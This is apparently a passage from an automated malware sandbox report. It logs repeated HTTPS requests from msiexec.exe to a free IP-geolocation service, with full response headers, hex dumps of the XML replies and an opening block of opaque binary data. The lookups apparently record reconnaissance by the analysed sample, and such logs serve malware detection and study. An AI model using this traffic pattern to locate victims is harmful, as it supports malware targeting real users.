                                                                                                                  2025-01-10 16:09:12 UTC1390INData Raw: 46 87 5d ab ea da e6 61 41 59 95 db 28 d7 db ba b2 4b 23 7a 52 e3 19 24 e8 c5 25 b4 7c 52 2e bf 6c 6f 02 fe cf 3f 95 24 ae 82 95 61 6c b0 4a 1b 0d 9e 99 68 f1 d6 9b 92 45 fa 4c d5 73 90 ff 2c 02 d0 7e 9b 41 34 33 8d f6 75 6f 32 1f 0d 74 e5 b6 3c b8 6b 77 4c b9 a8 8b 28 67 10 76 e5 93 23 80 2b 53 ac b6 81 7c 7a e7 5d c2 dd c2 be 4e b1 b0 65 87 24 a0 34 64 9c f1 ad ba 36 34 93 42 56 7b 6f 66 97 15 f1 4c 94 07 cf d4 46 aa f4 ff e3 75 30 48 5c f6 69 5a e1 2d 7a 77 2c e6 80 35 b3 e7 90 d2 db c0 35 8c 1c e3 3b b4 05 f1 38 8f b8 18 8a 3c 2a 8a 74 d1 e3 cb cd c8 cd fe 21 5a 52 d4 2e 48 dd 2a 09 e4 f6 67 94 36 6a cd 20 09 a7 4f 12 f2 c9 d4 ec c5 1d 2e 16 aa a9 26 c0 62 4f 4a ec 78 93 e4 dc b2 0d 2b ce 9e 32 e9 7a 51 e0 44 c8 36 df 00 19 3b 94 d0 15 5d f9 62 f5 d8
                                                                                                                  Data Ascii: F]aAY(K#zR$%|R.lo?$alJhELs,~A43uo2t<kwL(gv#+S|z]Ne$4d64BV{ofLFu0H\iZ-zw,55;8<*t!ZR.H*g6j O.&bOJx+2zQD6;]b


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.1149984104.21.80.14431480C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 16:09:15 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 16:09:16 UTC863INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:15 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1840145
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jxyCKTnuQBc6q0A11e5XA76ndYCAtAKhWTj%2B89IuI8vDVlFwz%2BRrx%2BxvW%2B1FudIAwXxyjJ1Clj%2BAWFgVfvOtK1lmGB%2BuQhVFkWymJOTPn5vuUnlmvC9gQE%2FxyIdT57NePeiiMEP4"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ffdee32ab088c0f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1968&min_rtt=1948&rtt_var=772&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=699&delivery_rate=1381267&cwnd=223&unsent_bytes=0&cid=e48628c95ae1ac80&ts=162&x=0"
                                                                                                                  2025-01-10 16:09:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.1149985104.21.80.14431480C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 16:09:16 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  2025-01-10 16:09:16 UTC863INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:16 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1840146
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R2GD42HPcHa%2FdKkbf8u9oiS3ubhyQzeelPMxEnPryzQcAmOX%2Fx7sp4xD9ajZ0PZqVvqTSZfzvmS11b%2FF7Irr4dURGqD0iWNeb02QyJh583KH%2BerhE6d2VBW5Wl%2BELe6%2FexUwzRW%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ffdee38abd28c0f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2119&min_rtt=2111&rtt_var=798&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1383230&cwnd=223&unsent_bytes=0&cid=548b7ffaf55e6dc8&ts=155&x=0"
                                                                                                                  2025-01-10 16:09:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.1149987104.21.80.14431480C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 16:09:18 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 16:09:18 UTC865INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:18 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1840147
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=thytGCIvrftgSPLdnpGxD95H83k71mrGZdNK%2BIpeYr34OI92nxMzmIqq6fmjgo8T%2FlcC%2FKpjLWcJGEv9lz8a4s%2FmCN%2BijTyi1cnOedF9wURYIAyRp0fy%2FKd3OClbasL1%2BniR%2BBab"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ffdee4029c9c443-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1686&rtt_var=661&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1619523&cwnd=244&unsent_bytes=0&cid=3e08b7cf2c15a720&ts=151&x=0"
                                                                                                                  2025-01-10 16:09:18 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.1149989104.21.80.14431480C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 16:09:19 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 16:09:19 UTC861INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:19 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1840148
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l%2Bm8l84QfWaToII43ZbKPh8Edr4dFMJDUzcUgCn51v%2BB76cwf40TLXLkbosTLu16GBHw5zTazK1VNH%2BSybNivlmDoA2r3Svy%2FIthV6s2mUlnqciXO1KIrFot%2FXyNAt1sube0ze%2BE"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ffdee47fdd9c443-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1661&rtt_var=675&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1559829&cwnd=244&unsent_bytes=0&cid=e520081a7a612ab7&ts=150&x=0"
                                                                                                                  2025-01-10 16:09:19 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.1149991104.21.80.14431480C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 16:09:21 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 16:09:21 UTC855INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:21 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1840150
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5fiiaAyXZHYfDn3YVJV%2FV8haogVEHQvM5u%2BYsm93bUabFXUxHBVTIiQNUWT5cpKa3jHEyfu9ekTDl3seSRAKzZQSRAPmgI8THIyNS1luV3C8Imy7pz%2BZ91d11njVMzffOtl33q6B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ffdee5539c443ee-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1595&rtt_var=617&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1745367&cwnd=228&unsent_bytes=0&cid=a86b7d72e1aac283&ts=167&x=0"
                                                                                                                  2025-01-10 16:09:21 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.1149993104.21.80.14431480C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 16:09:22 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 16:09:22 UTC853INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:22 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1840151
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DnAGcHvUQAIYEWgFhNZQ00QJL2YeTs0T%2F4BOqddYcvx0IgqTmY37Vysq94BeZekXBN3u4qDcq9FFEtFWAgcQMUsBYtpfZOs1s2C3bdBxKObsRTe170l75h9yl1abZxkHnQ5%2Fi4Pz"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ffdee5ccbb30f36-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1821&min_rtt=1540&rtt_var=778&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1896103&cwnd=231&unsent_bytes=0&cid=82048bfbd1c411bc&ts=141&x=0"
                                                                                                                  2025-01-10 16:09:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.1149995104.21.80.14431480C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 16:09:25 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 16:09:25 UTC853INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:25 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1840154
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B8kvNnMoOkyqQYpqvJO3%2Fg33pPbbdjhxuxVq7G2ux4yP3xNxIkH940q8SYNG4gcWDhRzZFSgkmDGB7I3VeaqqUr0RQkLHrfmxWBNV6mydcE9N6N5VlkhVN316WyTDCN9kxcmTvti"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ffdee6d39c58c0f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2142&min_rtt=2098&rtt_var=818&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1391801&cwnd=223&unsent_bytes=0&cid=6ef0086e3175af02&ts=158&x=0"
                                                                                                                  2025-01-10 16:09:25 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.1149997104.21.80.14431480C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 16:09:27 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  2025-01-10 16:09:27 UTC855INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:27 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1840156
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J0T2his%2FMoT4afBNvFmeRUIFJxBeFw1myFEXaHcq6PVDu7t3FXuc7JmUEQATr2JyRGrC%2BA%2B9LanvdfdOvnAJ7MBfU7EtW3P0xO0ntjauQaxbjDXBqaqrcN71V1jjt1d7cBOQLHYp"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ffdee7b3f5842d2-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1590&rtt_var=613&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1759036&cwnd=229&unsent_bytes=0&cid=85fae8c6305513b7&ts=163&x=0"
                                                                                                                  2025-01-10 16:09:27 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  10192.168.2.1149999104.21.80.14431480C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 16:09:28 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  2025-01-10 16:09:28 UTC853INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:28 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1840157
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=02NWWq6MdCi4EeHr3O0ElA7tEw6%2B0OjkrbO3aOU2wSuO5AKS5hbyUWvf2HRJXapKKb2nyl2RjiREx3tiNnw9YazCJoa2bL6R5stHCzImvI56Pu%2FwxrvbqzwQVotTPVHVUXd02rvs"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ffdee82ea1642d2-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
